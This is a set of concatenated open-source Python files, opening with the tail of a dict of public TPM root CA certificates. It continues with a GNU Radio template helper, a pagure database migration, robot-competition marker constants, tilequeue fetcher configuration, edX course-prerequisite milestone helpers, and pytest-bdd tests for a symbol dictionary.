jpXUdJlh22tp12UMsreibmi5bsWYBgybwSbRgvzE
-----END CERTIFICATE-----""",
"NTC2": """-----BEGIN CERTIFICATE-----
MIIDSjCCAjKgAwIBAgIGAPadBmPZMA0GCSqGSIb3DQEBBQUAMFIxUDAcBgNVBAMT
FU5UQyBUUE0gRUsgUm9vdCBDQSAwMjAlBgNVBAoTHk51dm90b24gVGVjaG5vbG9n
eSBDb3Jwb3JhdGlvbjAJBgNVBAYTAlRXMB4XDTEyMDcxMTE2MzMyNFoXDTMyMDcx
MTE2MzMyNFowUjFQMBwGA1UEAxMVTlRDIFRQTSBFSyBSb290IENBIDAyMCUGA1UE
ChMeTnV2b3RvbiBUZWNobm9sb2d5IENvcnBvcmF0aW9uMAkGA1UEBhMCVFcwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDSagWxaANT1YA2YUSN7sq7yzOT
1ymbIM+WijhE5AGcLwLFoJ9fmaQrYL6fAW2EW/Q3yu97Q9Ysr8yYZ2XCCfxfseEr
Vs80an8Nk6LkTDz8+0Hm0Cct0klvNUAZEIvWpmgHZMvGijXyOcp4z494d8B28Ynb
I7x0JMXZZQQKQi+WfuHtntF+2osYScweocipPrGeONLKU9sngWZ2vnnvw1SBneTa
irxq0Q0SD6Bx9jtxvdf87euk8JzfPhX8jp8GEeAjmLwGR+tnOQrDmczGNmp7YYNN
R+Q7NZVoYWHw5jaoZnNxbouWUXZZxFqDsB/ndCKWtsIzRYPuWcqrFcmUN4SVAgMB
AAGjJjAkMA4GA1UdDwEB/wQEAwICBDASBgNVHRMBAf8ECDAGAQH/AgEAMA0GCSqG
SIb3DQEBBQUAA4IBAQAIkdDSErzPLPYrVthw4lKjW4tRYelUicMPEHKjQeVUAAS5
y9XTzB4DWISDAFsgtQjqHJj0xCG+vpY0Rmn2FCO/0YpP+YBQkdbJOsiyXCdFy9e4
gGjQ24gw1B+rr84+pkI51y952NYBdoQDeb7diPe+24U94f//DYt/JQ8cJua4alr3
2Pohhh5TxCXXfU2EHt67KyqBSxCSy9m4OkCOGLHL2X5nQIdXVj178mw6DSAwyhwR
n3uJo5MvUEoQTFZJKGSXfab619mIgzEr+YHsIQToqf44VfDMDdM+MFiXQ3a5fLii
hEKQ9DhBPtpHAbhFA4jhCiG9HA8FdEplJ+M4uxNz
-----END CERTIFICATE-----""",
"IFX1": """-----BEGIN CERTIFICATE-----
MIIEnzCCA4egAwIBAgIEMV64bDANBgkqhkiG9w0BAQUFADBtMQswCQYDVQQGEwJE
RTEQMA4GA1UECBMHQmF2YXJpYTEhMB8GA1UEChMYSW5maW5lb24gVGVjaG5vbG9n
aWVzIEFHMQwwCgYDVQQLEwNBSU0xGzAZBgNVBAMTEklGWCBUUE0gRUsgUm9vdCBD
QTAeFw0wNTEwMjAxMzQ3NDNaFw0yNTEwMjAxMzQ3NDNaMHcxCzAJBgNVBAYTAkRF
MQ8wDQYDVQQIEwZTYXhvbnkxITAfBgNVBAoTGEluZmluZW9uIFRlY2hub2xvZ2ll
cyBBRzEMMAoGA1UECxMDQUlNMSYwJAYDVQQDEx1JRlggVFBNIEVLIEludGVybWVk
aWF0ZSBDQSAwMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALftPhYN
t4rE+JnU/XOPICbOBLvfo6iA7nuq7zf4DzsAWBdsZEdFJQfaK331ihG3IpQnlQ2i
YtDim289265f0J4OkPFpKeFU27CsfozVaNUm6UR/uzwA8ncxFc3iZLRMRNLru/Al
VG053ULVDQMVx2iwwbBSAYO9pGiGbk1iMmuZaSErMdb9v0KRUyZM7yABiyDlM3cz
UQX5vLWV0uWqxdGoHwNva5u3ynP9UxPTZWHZOHE6+14rMzpobs6Ww2RR8BgF96rh
4rRAZEl8BXhwiQq4STvUXkfvdpWH4lzsGcDDtrB6Nt3KvVNvsKz+b07Dk+Xzt+EH
NTf3Byk2HlvX+scCAwEAAaOCATswggE3MB0GA1UdDgQWBBQ4k8292HPEIzMV4bE7
qWoNI8wQxzAOBgNVHQ8BAf8EBAMCAgQwEgYDVR0TAQH/BAgwBgEB/wIBADBYBgNV
HSABAf8ETjBMMEoGC2CGSAGG+EUBBy8BMDswOQYIKwYBBQUHAgEWLWh0dHA6Ly93
d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvaW5kZXguaHRtbDCBlwYDVR0jBIGP
MIGMgBRW65FEhWPWcrOu1EWWC/eUDlRCpqFxpG8wbTELMAkGA1UEBhMCREUxEDAO
BgNVBAgTB0JhdmFyaWExITAfBgNVBAoTGEluZmluZW9uIFRlY2hub2xvZ2llcyBB
RzEMMAoGA1UECxMDQUlNMRswGQYDVQQDExJJRlggVFBNIEVLIFJvb3QgQ0GCAQMw
DQYJKoZIhvcNAQEFBQADggEBABJ1+Ap3rNlxZ0FW0aIgdzktbNHlvXWNxFdYIBbM
OKjmbOos0Y4O60eKPu259XmMItCUmtbzF3oKYXq6ybARUT2Lm+JsseMF5VgikSlU
BJALqpKVjwAds81OtmnIQe2LSu4xcTSavpsL4f52cUAu/maMhtSgN9mq5roYptq9
DnSSDZrX4uYiMPl//rBaNDBflhJ727j8xo9CCohF3yQUoQm7coUgbRMzyO64yMIO
3fhb+Vuc7sNwrMOz3VJN14C3JMoGgXy0c57IP/kD5zGRvljKEvrRC2I147+fPeLS
DueRMS6lblvRKiZgmGAg7YaKOkOaEmVDMQ+fTo2Po7hI5wc=
-----END CERTIFICATE-----""",
"IFX2": """-----BEGIN CERTIFICATE-----
MIIEnzCCA4egAwIBAgIEaItIgTANBgkqhkiG9w0BAQUFADBtMQswCQYDVQQGEwJE
RTEQMA4GA1UECBMHQmF2YXJpYTEhMB8GA1UEChMYSW5maW5lb24gVGVjaG5vbG9n
aWVzIEFHMQwwCgYDVQQLEwNBSU0xGzAZBgNVBAMTEklGWCBUUE0gRUsgUm9vdCBD
QTAeFw0wNjEyMjExMDM0MDBaFw0yNjEyMjExMDM0MDBaMHcxCzAJBgNVBAYTAkRF
MQ8wDQYDVQQIEwZTYXhvbnkxITAfBgNVBAoTGEluZmluZW9uIFRlY2hub2xvZ2ll
cyBBRzEMMAoGA1UECxMDQUlNMSYwJAYDVQQDEx1JRlggVFBNIEVLIEludGVybWVk
aWF0ZSBDQSAwMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6KnP5R
8ppq9TtPu3mAs3AFxdWhzK5ks+BixGR6mpzyXG64Bjl4xzBXeBIVtlBZXYvIAJ5s
eCTEEsnZc9eKNJeFLdmXQ/siRrTeonyxoS4aL1mVEQebLUz2gN9J6j1ewly+OvGk
jEYouGCzA+fARzLeRIrhuhBI0kUChbH7VM8FngJsbT4xKB3EJ6Wttma25VSimkAr
SPS6dzUDRS1OFCWtAtHJW6YjBnA4wgR8WfpXsnjeNpwEEB+JciWu1VAueLNI+Kis
RiferCfsgWRvHkR6RQf04h+FlhnYHJnf1ktqcEi1oYAjLsbYOAwqyoU1Pev9cS28
EA6FTJcxjuHhH9ECAwEAAaOCATswggE3MB0GA1UdDgQWBBRDMlr1 |
riveridea/gnuradio | gr-utils/python/modtool/code_generator.py | Python | gpl-3.0 | 2,485 | 0.000805 | #
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either v | ersion 3, | or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
""" A code generator (needed by ModToolAdd) """
from templates import Templates
import Cheetah.Template
from util_functions import str_to_fancyc_comment
from util_functions import str_to_python_comment
from util_functions import strip_default_values
from util_functions import strip_arg_types
from util_functions import strip_arg_types_grc
class GRMTemplate(Cheetah.Template.Template):
    """Cheetah template wrapper that injects GNU Radio helper functions."""

    def __init__(self, src, searchList):
        # Map block type keys onto the gr:: parent class names.
        self.grtypelist = {
            'sync': 'sync_block',
            'sink': 'sync_block',
            'source': 'sync_block',
            'decimator': 'sync_decimator',
            'interpolator': 'sync_interpolator',
            'general': 'block',
            'tagged_stream': 'tagged_stream_block',
            'hier': 'hier_block2',
            'noblock': ''}
        # Expose the string-munging helpers to the template namespace
        # under their own function names.
        for helper in (str_to_fancyc_comment,
                       str_to_python_comment,
                       strip_default_values,
                       strip_arg_types,
                       strip_arg_types_grc):
            searchList[helper.__name__] = helper
        Cheetah.Template.Template.__init__(self, src, searchList=searchList)
        self.grblocktype = self.grtypelist[searchList['blocktype']]
        prefix = searchList['modname']
        if searchList['is_component']:
            prefix = "gnuradio/" + prefix
        self.include_dir_prefix = prefix
def get_template(tpl_id, **kwargs):
    """Look up the template *tpl_id* and render it through Cheetah."""
    template = GRMTemplate(Templates[tpl_id], searchList=kwargs)
    return str(template)
|
pypingou/pagure | alembic/versions/1640c7d75e5f_add_reports_field_to_project.py | Python | gpl-2.0 | 579 | 0.003454 | """Add reports field to project
Revisi | on ID: 1640c7d75e5f
Revises: 1d18843a1994
Create Date: 2016-09-09 16:11:28.099423
"""
# revision identifiers, used by Alembic.
revision = '1640c7d75e5f'
down_revision = '1d18843a1994'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add the nullable text column ``_reports`` to the ``projects`` table."""
    op.add_column(
        'projects',
        sa.Column('_reports', sa.Text, nullable=True),
    )
def downgrade():
    """Drop the ``_reports`` column from the ``projects`` table."""
    op.drop_column('projects', '_reports')
|
sourcebots/robot-api | robot/game_specific.py | Python | mit | 2,127 | 0 | # ******************************************************************************
# NOTICE: IF YOU CHANGE THIS FILE PLEASE CHANGE ITS COUNTERPART IN SB_VISION
# ******************************************************************************
# Try to put all game specific code in here
# Marker IDs 0-27 ring the arena walls.
WALL = set(range(0, 28))

# Currently for Smallpeice 2018
GAME_DURATION_SECONDS = 120

# Currently for SB2018: each column owns four consecutive marker IDs,
# one per compass-facing face (N, E, S, W repeating every 4 IDs).
COLUMN_N = set(range(28, 32))
COLUMN_E = set(range(32, 36))
COLUMN_S = set(range(36, 40))
COLUMN_W = set(range(40, 44))

COLUMN_FACING_N = set(range(28, 44, 4))
COLUMN_FACING_E = set(range(29, 44, 4))
COLUMN_FACING_S = set(range(30, 44, 4))
COLUMN_FACING_W = set(range(31, 44, 4))

# Individual column faces: each column/facing pair intersects in exactly
# one marker ID, extracted here by single-element unpacking.
(COLUMN_N_FACING_N,) = COLUMN_N & COLUMN_FACING_N
(COLUMN_N_FACING_S,) = COLUMN_N & COLUMN_FACING_S
(COLUMN_N_FACING_E,) = COLUMN_N & COLUMN_FACING_E
(COLUMN_N_FACING_W,) = COLUMN_N & COLUMN_FACING_W

(COLUMN_S_FACING_N,) = COLUMN_S & COLUMN_FACING_N
(COLUMN_S_FACING_S,) = COLUMN_S & COLUMN_FACING_S
(COLUMN_S_FACING_E,) = COLUMN_S & COLUMN_FACING_E
(COLUMN_S_FACING_W,) = COLUMN_S & COLUMN_FACING_W

(COLUMN_E_FACING_N,) = COLUMN_E & COLUMN_FACING_N
(COLUMN_E_FACING_S,) = COLUMN_E & COLUMN_FACING_S
(COLUMN_E_FACING_E,) = COLUMN_E & COLUMN_FACING_E
(COLUMN_E_FACING_W,) = COLUMN_E & COLUMN_FACING_W

(COLUMN_W_FACING_N,) = COLUMN_W & COLUMN_FACING_N
(COLUMN_W_FACING_S,) = COLUMN_W & COLUMN_FACING_S
(COLUMN_W_FACING_E,) = COLUMN_W & COLUMN_FACING_E
(COLUMN_W_FACING_W,) = COLUMN_W & COLUMN_FACING_W

COLUMN = COLUMN_N | COLUMN_E | COLUMN_S | COLUMN_W

# Token markers, split into one zone per corner of the arena.
TOKEN = set(range(44, 64))
TOKEN_ZONE_0 = set(range(44, 49))
TOKEN_ZONE_1 = set(range(49, 54))
TOKEN_ZONE_2 = set(range(54, 59))
TOKEN_ZONE_3 = set(range(59, 64))

# The following constants are used to define the marker sizes
MARKER_SIZES = {m: (0.25, 0.25) for m in WALL | COLUMN}
MARKER_SIZES.update({m: (0.1, 0.1) for m in TOKEN})

# Size the vision system will assume a marker is if it's not in MARKER_SIZES
MARKER_SIZE_DEFAULT = (0.25, 0.25)
mapzen/tilequeue | tilequeue/query/__init__.py | Python | mit | 6,789 | 0 | from tilequeue.query.fixture import make_fixture_data_fetcher
from tilequeue.query.pool import DBConnectionPool
from tilequeue.query.postgres import make_db_data_fetcher
from tilequeue.query.rawr import make_rawr_data_fetcher
from tilequeue.query.split import make_split_data_fetcher
from tilequeue.process import Source
from tilequeue.store import make_s3_tile_key_generator
__all__ = [
'DBConnectionPool',
'make_db_data_fetcher',
'make_fixture_data_fetcher',
'make_data_fetcher',
]
def make_data_fetcher(cfg, layer_data, query_cfg, io_pool):
    """Build the tile data fetcher.

    Returns a plain database fetcher unless the config enables RAWR tiles,
    in which case the fetch is split by zoom between DB and RAWR sources.
    """
    db_fetcher = make_db_data_fetcher(
        cfg.postgresql_conn_info, cfg.template_path, cfg.reload_templates,
        query_cfg, io_pool)

    if not cfg.yml.get('use-rawr-tiles'):
        return db_fetcher

    rawr_fetcher = _make_rawr_fetcher(cfg, layer_data, query_cfg, io_pool)
    group_by_zoom = cfg.yml.get('rawr').get('group-zoom')
    assert group_by_zoom is not None, 'Missing group-zoom rawr config'
    return make_split_data_fetcher(group_by_zoom, db_fetcher, rawr_fetcher)
class _NullRawrStorage(object):
    """RAWR "storage" that generates tile data on the fly from a source."""

    def __init__(self, data_source, table_sources):
        self.data_source = data_source
        self.table_sources = table_sources

    def __call__(self, tile):
        # Returns a "tables" object, which responds to __call__(table_name)
        # with tuples for that table.
        data = {
            location.name: location.records
            for location in self.data_source(tile)
        }

        def _tables(table_name):
            # Imported lazily to keep this module importable without the
            # full query machinery.
            from tilequeue.query.common import Table
            source = self.table_sources[table_name]
            return Table(source, data.get(table_name, []))

        return _tables
def _make_rawr_fetcher(cfg, layer_data, query_cfg, io_pool):
    # Build a RAWR-tile data fetcher from the 'rawr' section of the config:
    # validate the config, turn table sources into Source objects, choose a
    # storage backend (s3 / generate / store) and wire it all together.
    rawr_yaml = cfg.yml.get('rawr')
    assert rawr_yaml is not None, 'Missing rawr configuration in yaml'

    group_by_zoom = rawr_yaml.get('group-zoom')
    assert group_by_zoom is not None, 'Missing group-zoom rawr config'

    rawr_source_yaml = rawr_yaml.get('source')
    assert rawr_source_yaml, 'Missing rawr source config'

    table_sources = rawr_source_yaml.get('table-sources')
    assert table_sources, 'Missing definitions of source per table'

    # map text for table source onto Source objects
    for tbl, data in table_sources.items():
        source_name = data['name']
        source_value = data['value']
        table_sources[tbl] = Source(source_name, source_value)

    # Normalize label placement layer lists to sets, keyed by geometry type.
    label_placement_layers = rawr_yaml.get('label-placement-layers', {})
    for geom_type, layers in label_placement_layers.items():
        assert geom_type in ('point', 'polygon', 'linestring'), \
            'Geom type %r not understood, expecting point, polygon or ' \
            'linestring.' % (geom_type,)
        label_placement_layers[geom_type] = set(layers)

    indexes_cfg = rawr_yaml.get('indexes')
    assert indexes_cfg, 'Missing definitions of table indexes.'

    # source types are:
    #   s3       - to fetch RAWR tiles from S3
    #   store    - to fetch RAWR tiles from any tilequeue tile source
    #   generate - to generate RAWR tiles directly, rather than trying to
    #              load them from S3. this can be useful for standalone use
    #              and testing. provide a postgresql subkey for database
    #              connection settings.
    source_type = rawr_source_yaml.get('type')

    if source_type == 's3':
        rawr_source_s3_yaml = rawr_source_yaml.get('s3')
        bucket = rawr_source_s3_yaml.get('bucket')
        assert bucket, 'Missing rawr source s3 bucket'
        region = rawr_source_s3_yaml.get('region')
        assert region, 'Missing rawr source s3 region'
        prefix = rawr_source_s3_yaml.get('prefix')
        assert prefix, 'Missing rawr source s3 prefix'
        extension = rawr_source_s3_yaml.get('extension')
        assert extension, 'Missing rawr source s3 extension'
        allow_missing_tiles = rawr_source_s3_yaml.get(
            'allow-missing-tiles', False)

        # Backend-specific imports are deferred so that unused backends
        # don't need their dependencies installed.
        import boto3
        from tilequeue.rawr import RawrS3Source
        s3_client = boto3.client('s3', region_name=region)
        tile_key_gen = make_s3_tile_key_generator(rawr_source_s3_yaml)
        storage = RawrS3Source(
            s3_client, bucket, prefix, extension, table_sources, tile_key_gen,
            allow_missing_tiles)

    elif source_type == 'generate':
        from raw_tiles.source.conn import ConnectionContextManager
        from raw_tiles.source.osm import OsmSource

        postgresql_cfg = rawr_source_yaml.get('postgresql')
        assert postgresql_cfg, 'Missing rawr postgresql config'

        conn_ctx = ConnectionContextManager(postgresql_cfg)
        rawr_osm_source = OsmSource(conn_ctx)
        storage = _NullRawrStorage(rawr_osm_source, table_sources)

    elif source_type == 'store':
        from tilequeue.store import make_store
        from tilequeue.rawr import RawrStoreSource

        store_cfg = rawr_source_yaml.get('store')
        store = make_store(store_cfg,
                           credentials=cfg.subtree('aws credentials'))
        storage = RawrStoreSource(store, table_sources)

    else:
        assert False, 'Source type %r not understood. ' \
            'Options are s3, generate and store.' % (source_type,)

    # TODO: this needs to be configurable, everywhere! this is a long term
    # refactor - it's hard-coded in a bunch of places :-(
    max_z = 16

    layers = _make_layer_info(layer_data, cfg.process_yaml_cfg)

    return make_rawr_data_fetcher(
        group_by_zoom, max_z, storage, layers, indexes_cfg,
        label_placement_layers)
def _make_layer_info(layer_data, process_yaml_cfg):
    """Build a {layer name: LayerInfo} mapping from the per-layer config data."""
    from tilequeue.query.common import LayerInfo, ShapeType

    calc_fns = _parse_yaml_functions(process_yaml_cfg)
    layers = {}
    for datum in layer_data:
        layer_name = datum['name']
        min_zoom_fn, props_fn = calc_fns[layer_name]
        geometry_types = ShapeType.parse_set(datum['geometry_types'])
        layers[layer_name] = LayerInfo(min_zoom_fn, props_fn, geometry_types)
    return layers
def _parse_yaml_functions(process_yaml_cfg):
    """Return {layer name: (min_zoom_fn, output_fn)} parsed from the yaml config."""
    from tilequeue.command import make_output_calc_mapping
    from tilequeue.command import make_min_zoom_calc_mapping

    output_fns = make_output_calc_mapping(process_yaml_cfg)
    min_zoom_fns = make_min_zoom_calc_mapping(process_yaml_cfg)
    # Both mappings must describe exactly the same set of layers.
    assert set(output_fns.keys()) == set(min_zoom_fns.keys())
    return {
        layer_name: (min_zoom_fns[layer_name], output_fns[layer_name])
        for layer_name in output_fns
    }
|
eduNEXT/edx-platform | common/djangoapps/util/milestones_helpers.py | Python | agpl-3.0 | 16,458 | 0.002917 | """
Utility library for working with the edx-milestones app
"""
from django.conf import settings
from django.utils.translation import gettext as _
from edx_toggles.toggles import SettingDictToggle
from milestones import api as milestones_api
from milestones.exceptions import InvalidMilestoneRelationshipTypeException, InvalidUserException
from milestones.models import MilestoneRelationshipType
from milestones.services import MilestonesService
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from openedx.core.lib.cache_utils import get_cache
from xmodule.modulestore.django import modulestore # lint-amnesty, pylint: disable=wrong-import-order
NAMESPACE_CHOICES = {
    'ENTRANCE_EXAM': 'entrance_exams'
}
REQUEST_CACHE_NAME = "milestones"
# TODO this should be moved to edx/edx-milestones
# .. toggle_name: FEATURES['MILESTONES_APP']
# .. toggle_implementation: SettingDictToggle
# .. toggle_default: False
# .. toggle_description: Enable the milestones application, which manages significant Course and/or Student events in
#   the Open edX platform. (see https://github.com/edx/edx-milestones) Note that this feature is required to enable
#   course pre-requisites.
# .. toggle_use_cases: open_edx
# .. toggle_creation_date: 2014-11-21
ENABLE_MILESTONES_APP = SettingDictToggle("FEATURES", "MILESTONES_APP", default=False, module_name=__name__)
def get_namespace_choices():
    """
    Return the NAMESPACE_CHOICES mapping (milestone namespace labels) to the caller.
    """
    return NAMESPACE_CHOICES
def is_prerequisite_courses_enabled():
    """
    Returns boolean indicating prerequisite courses enabled system wide or not.

    NOTE(review): the result is truthy/falsy rather than a strict bool when
    'ENABLE_PREREQUISITE_COURSES' is absent (dict.get returns None).
    """
    return settings.FEATURES.get('ENABLE_PREREQUISITE_COURSES') and ENABLE_MILESTONES_APP.is_enabled()
def add_prerequisite_course(course_key, prerequisite_course_key):
    """
    Link two courses with a prerequisite milestone.

    Creates a milestone, registers it as a requirement of the course
    referred to by `course_key`, and marks the course referred to by
    `prerequisite_course_key` as fulfilling it. Returns None without doing
    anything when the prerequisite-courses feature is disabled.
    """
    if not is_prerequisite_courses_enabled():
        return None
    milestone_name = _('Course {course_id} requires {prerequisite_course_id}').format(
        course_id=str(course_key),
        prerequisite_course_id=str(prerequisite_course_key)
    )
    # The milestone is namespaced by the prerequisite course so it can be
    # found again from either side of the relationship.
    milestone = milestones_api.add_milestone({
        'name': milestone_name,
        'namespace': str(prerequisite_course_key),
        'description': _('System defined milestone'),
    })
    # add requirement course milestone
    milestones_api.add_course_milestone(course_key, 'requires', milestone)
    # add fulfillment course milestone
    milestones_api.add_course_milestone(prerequisite_course_key, 'fulfills', milestone)
def remove_prerequisite_course(course_key, milestone):
    """
    Detach the given pre-requisite `milestone` from the course identified by
    `course_key`. Does nothing when the prerequisite feature is disabled.
    """
    if is_prerequisite_courses_enabled():
        milestones_api.remove_course_milestone(course_key, milestone)
def set_prerequisite_courses(course_key, prerequisite_course_keys):
    """
    Replace the requirement milestones of `course_key` with new ones built
    from `prerequisite_course_keys`.

    Passing an empty list or None as `prerequisite_course_keys` simply clears
    the existing requirement milestones. No-op when the feature is disabled.
    """
    if not is_prerequisite_courses_enabled():
        return None
    # Clear every existing 'requires' milestone before attaching the new set.
    existing_milestones = milestones_api.get_course_milestones(
        course_key=course_key, relationship="requires")
    for milestone in existing_milestones or []:
        remove_prerequisite_course(course_key, milestone)
    # Attach one milestone per requested prerequisite course.
    for prerequisite_key_string in (prerequisite_course_keys or []):
        add_prerequisite_course(
            course_key, CourseKey.from_string(prerequisite_key_string))
def get_pre_requisite_courses_not_completed(user, enrolled_courses):
    """
    Makes a dict mapping courses to their unfulfilled milestones using the
    fulfillment API of the milestones app.

    Arguments:
        user (User): the user for whom we are checking prerequisites.
        enrolled_courses (CourseKey): a list of keys for the courses to be
            checked. The given user must be enrolled in all of these courses.

    Returns:
        dict[CourseKey: dict['courses': list[dict['key': CourseKey, 'display': str]]]]
        If a course has no incomplete prerequisites, it will be excluded from
        the dictionary.
    """
    if not is_prerequisite_courses_enabled():
        return {}
    pre_requisite_courses = {}
    for course_key in enrolled_courses:
        required_courses = []
        fulfillment_paths = milestones_api.get_course_milestones_fulfillment_paths(course_key, {'id': user.id})
        # fulfillment_paths maps milestone identifiers to dicts; only the
        # 'courses' entries (unfulfilled prerequisite course ids) matter here.
        for __, milestone_value in fulfillment_paths.items():
            for key, value in milestone_value.items():
                if key == 'courses' and value:
                    for required_course in value:
                        required_course_key = CourseKey.from_string(required_course)
                        required_course_overview = CourseOverview.get_from_id(required_course_key)
                        required_courses.append({
                            'key': required_course_key,
                            'display': get_course_display_string(required_course_overview)
                        })
        # If there are required courses, add them to the result dict.
        if required_courses:
            pre_requisite_courses[course_key] = {'courses': required_courses}
    return pre_requisite_courses
def get_prerequisite_courses_display(course_descriptor):
    """
    Return a list of {'key': CourseKey, 'display': str} dicts, one per
    pre-requisite course of `course_descriptor`. Empty when the feature is
    disabled or the course declares no prerequisites.
    """
    courses = []
    if not (is_prerequisite_courses_enabled() and course_descriptor.pre_requisite_courses):
        return courses
    for course_id in course_descriptor.pre_requisite_courses:
        course_key = CourseKey.from_string(course_id)
        required_course_descriptor = modulestore().get_course(course_key)
        courses.append({
            'key': course_key,
            'display': get_course_display_string(required_course_descriptor)
        })
    return courses
def get_course_display_string(descriptor):
    """
    Return "<org> <number>" for a course or course overview.

    Arguments:
        descriptor (CourseBlock|CourseOverview): a course or course overview.
    """
    org = descriptor.display_org_with_default
    number = descriptor.display_number_with_default
    return ' '.join((org, number))
def fulfill_course_milestone(course_key, user):
    """
    Marks the course specified by the given course_key as complete for the given user.
    If any other courses require this course as a prerequisite, their milestones will be appropriately updated.

    No-op (returns None) when the milestones app is disabled.
    """
    if not ENABLE_MILESTONES_APP.is_enabled():
        return None
    try:
        course_milestones = milestones_api.get_course_milestones(course_key=course_key, relationship="fulfills")
    except InvalidMilestoneRelationshipTypeException:
        # we have not seeded milestone relationship types
        # NOTE(review): seed_milestone_relationship_types is defined elsewhere
        # in this module — confirm it stays importable at this call site.
        seed_milestone_relationship_types()
        course_milestones = milestones_api.get_course_milestones(course_key=course_key, relationship="fulfills")
    for milestone in course_milestones:
        milestones_api.add_user_milestone({'id': user.id}, milestone)
def remove_course_milestones(course_key, user, relationship):
"""
Remove all user milestones for the course specified by course_key.
"" |
canaryhealth/pyramid_test | pyramid_test/__init__.py | Python | mit | 106 | 0 | # -*- coding: utf-8 -*-
from .api import *
from .db import *
fr | om .runner import *
from .server import *
|
Gribouillis/symboldict | tests/various/test_strict.py | Python | mit | 6,420 | 0.005452 | """Strict and non strict symboldict feature tests."""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from functools import partial
import pytest
from pytest_bdd import (
given,
scenario,
then,
when,
)
import symboldict as sd
# Bind every @scenario below to the shared feature file once, instead of
# repeating the path in each decorator.
scenario = partial(scenario, '../features/strict.feature')
@scenario('Attributes of SymbolDict types are allowed keys in non strict symboldict')
def test_attributes_of_symboldict_types_are_allowed_keys_in_non_strict_symboldict():
    """Attributes of SymbolDict types are allowed keys in non strict symboldict."""
@scenario('Attributes of SymbolDict types are forbidden keys in strict symboldict')
def test_attributes_of_symboldict_types_are_forbidden_keys_in_strict_symboldict():
    """Attributes of SymbolDict types are forbidden keys in strict symboldict."""
@scenario('Check strictness of new symboldict')
def test_check_strictness_of_new_symboldict():
    """Check strictness of new symboldict."""
@scenario('Creating strict symboldict from dict having forbidden key raises TypeError')
def test_creating_strict_symboldict_from_dict_having_forbidden_key_raises_typeerror():
    """Creating strict symboldict from dict having forbidden key raises TypeError."""
@scenario('Creating strict symboldict from sequence having forbidden item raises TypeError')
def test_creating_strict_symboldict_from_sequence_having_forbidden_item_raises_typeerror():
    """Creating strict symboldict from sequence having forbidden item raises TypeError."""
@scenario('Forbidden key setting raise TypeError in strict symboldict')
def test_forbidden_key_setting_raise_typeerror_in_strict_symboldict(strict_symboldict):
    """Forbidden key setting raise TypeError in strict symboldict."""
    # 'update' is a dict method name, so a strict SymbolDict must reject it.
    with pytest.raises(TypeError):
        strict_symboldict['update'] = 'sys.version_info'
@scenario('Setting symboldict strict raises TypeError if there is forbidden key')
def test_setting_symboldict_strict_raises_typeerror_if_there_is_forbidden_key():
    """Setting symboldict strict raises TypeError if there is forbidden key."""
@scenario('Updating strict symboldict from sequence having forbidden item raises TypeError')
def test_updating_strict_symboldict_from_sequence_having_forbidden_item_raises_typeerror():
    """Updating strict symboldict from sequence having forbidden item raises TypeError."""
@scenario('Updating strict symboldict with dict having forbidden key raises TypeError')
def test_updating_strict_symboldict_with_dict_having_forbidden_key_raises_typeerror():
    """Updating strict symboldict with dict having forbidden key raises TypeError."""
# pytest-bdd 'given' fixtures supplying the objects the scenarios act on.
@given('dict containing forbidden key')
def dict_containing_forbidden_key():
    """dict containing forbidden key."""
    # NOTE(review): this fixture returns None, not a dict — confirm the
    # scenarios using it still exercise the intended code path.
@given('new <how> symboldict')
def new_how_symboldict(how):
    """new <how> symboldict."""
    if how == 'empty':
        return sd.SymbolDict()
    else:
        return sd.SymbolDict(isfile='os.path.isfile', Telnet='telnetlib.Telnet',
                             conju='complex.conjugate', eggs='telnetlib.eggs')
@given('non strict symboldict')
def non_strict_symboldict():
    """non strict symboldict."""
    return sd.LaxSymbolDict()
@given('sequence of items containing forbidden key')
def sequence_of_items_containing_forbidden_key():
    """sequence of items containing forbidden key."""
    return [('strict', 'indeed'),]
@given('strict symboldict')
def strict_symboldict():
    """strict symboldict."""
    return sd.SymbolDict()
@given('symboldict containing forbidden key')
def symboldict_containing_forbidden_key():
    """symboldict containing forbidden key."""
    return sd.LaxSymbolDict(values = 'dict.values')
# pytest-bdd 'then' steps asserting the strict/non-strict key rules.
@then('all attributes of SymbolDict type are allowed keys in symboldict')
def all_attributes_of_symboldict_type_are_allowed_keys_in_symboldict(non_strict_symboldict):
    """all attributes of SymbolDict type are allowed keys in symboldict."""
    for key in dir(sd.SymbolDict):
        non_strict_symboldict[key] = 'sys.version_info'
@then('creating strict symboldict from dict raises TypeError')
def creating_strict_symboldict_from_dict_raises_typeerror(dict_containing_forbidden_key):
    """creating strict symboldict from dict raises TypeError."""
    with pytest.raises(TypeError):
        sd.SymbolDict(dict_containing_forbidden_key)
@then('creating strict symboldict from sequence raises TypeError')
def creating_strict_symboldict_from_sequence_raises_typeerror(
        sequence_of_items_containing_forbidden_key):
    """creating strict symboldict from sequence raises TypeError."""
    with pytest.raises(TypeError):
        sd.SymbolDict(sequence_of_items_containing_forbidden_key)
@then('every attribute of SymbolDict type is forbidden key in symboldict')
def every_attribute_of_symboldict_type_is_forbidden_key_in_symboldict(strict_symboldict):
    """every attribute of SymbolDict type is forbidden key in symboldict."""
    s = sd.Symbol('sys.executable')
    for key in dir(sd.SymbolDict):
        with pytest.raises(TypeError):
            strict_symboldict[key] = s
@then('setting symboldict item with forbidden key raises TypeError')
def setting_symboldict_item_with_forbidden_key_raises_typeerror():
    """setting symboldict item with forbidden key raises TypeError."""
@then('setting symboldict strict raises TypeError')
def setting_symboldict_strict_raises_typeerror(symboldict_containing_forbidden_key):
    """setting symboldict strict raises TypeError."""
    with pytest.raises(TypeError):
